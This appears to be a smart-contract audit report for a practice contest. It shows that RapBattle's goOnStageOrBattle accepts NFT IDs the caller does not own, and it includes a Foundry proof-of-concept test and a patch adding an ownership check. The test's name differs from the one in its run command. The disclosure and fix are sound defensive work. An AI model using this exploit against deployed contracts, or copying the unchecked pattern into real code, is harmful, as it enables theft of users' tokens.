First Flight #10: One Shot

Description:

• A user can call RapBattle::goOnStageOrBattle as a challenger passing a non-existent NFT ID or using other people's NFT ID to battle.

• Impact:

  • The user can collect Cred from the battle without having a Rapper NFT.

• Proof of Concept:

  • Add the code below to OneShotTest.t.sol

  • Call the test by using forge test --mt testPoCGoOnStage -vvvvv

  • The function will go through, however you will receive the error FAIL. Reason: ERC721NonexistentToken(10) from the ownerOf function after the execution.

    Add the code below to `OneShotTest.t.sol`

    function testIfCanCallWithNonExistantNFTID() public twoSkilledRappers {

    vm.startPrank(user);

    oneShot.approve(address(rapBattle), 0);

    cred.approve(address(rapBattle), 10);

    rapBattle.goOnStageOrBattle(0, 3);

    vm.stopPrank();

    ​

    vm.startPrank(challenger);

    cred.approve(address(rapBattle), 10);

    ​

    rapBattle.goOnStageOrBattle(100, 3);

    vm.stopPrank();

    ​

    assert(oneShot.ownerOf(0) == address(user));

    @> address nftOwner = oneShot.ownerOf(100);

    }

• Recommendation:

  See the code recommendation below

  function goOnStageOrBattle(uint256 _tokenId, uint256 _credBet) external {

  + if(oneShotNft.ownerOf(_tokenId) != msg.sender){

  + revert RapBattle__YouMustBeTheNFTOwner();

  + }

  if (defender == address(0)) {

  defender = msg.sender;

  defenderBet = _credBet;

  defenderTokenId = _tokenId;

  ​

  emit OnStage(msg.sender, _tokenId, _credBet);

  ​

  oneShotNft.transferFrom(msg.sender, address(this), _tokenId);

  credToken.transferFrom(msg.sender, address(this), _credBet);

  } else {

  // credToken.transferFrom(msg.sender, address(this), _credBet);

  _battle(_tokenId, _credBet);

  }

  }